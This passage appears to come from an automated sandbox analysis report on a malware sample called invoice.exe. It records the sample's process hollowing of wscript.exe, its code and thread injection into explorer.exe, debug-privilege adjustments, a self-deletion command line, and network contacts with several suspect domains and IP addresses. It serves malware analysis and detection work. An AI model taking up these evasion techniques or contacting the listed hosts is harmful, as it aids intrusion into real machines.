          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0471B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0471B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04678A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04683A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04665210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0467AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04738B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0466F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0468DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_046E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04735BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0471D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0472138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0469B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_04692397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.highdeserthealthinsurance.com
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.64 80
          Source: C:\Windows\explorer.exeDomain query: www.dateyourlovelive.club
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.legacyadmin.support
          Source: C:\Windows\explorer.exeDomain query: www.gunungbatufrozen.com
          Source: C:\Windows\explorer.exeDomain query: www.hotelmaktub.com
          Source: C:\Windows\explorer.exeDomain query: www.flowhcf.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeDomain query: www.sookepointcargo.com
          Source: C:\Windows\explorer.exeDomain query: www.jinlan.online
          Source: C:\Windows\explorer.exeDomain query: www.armaccountingbs.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.156.117.131 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exeDomain query: www.zmid.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 177.55.108.130 80
          Source: C:\Windows\explorer.exeDomain query: www.knoxvilleoutdoorkitchens.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\invoice.exeMemory written: C:\Users\user\Desktop\invoice.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\invoice.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: E0000
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: explorer.exe, 00000004.00000000.261500352.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.246523611.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Users\user\Desktop\invoice.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
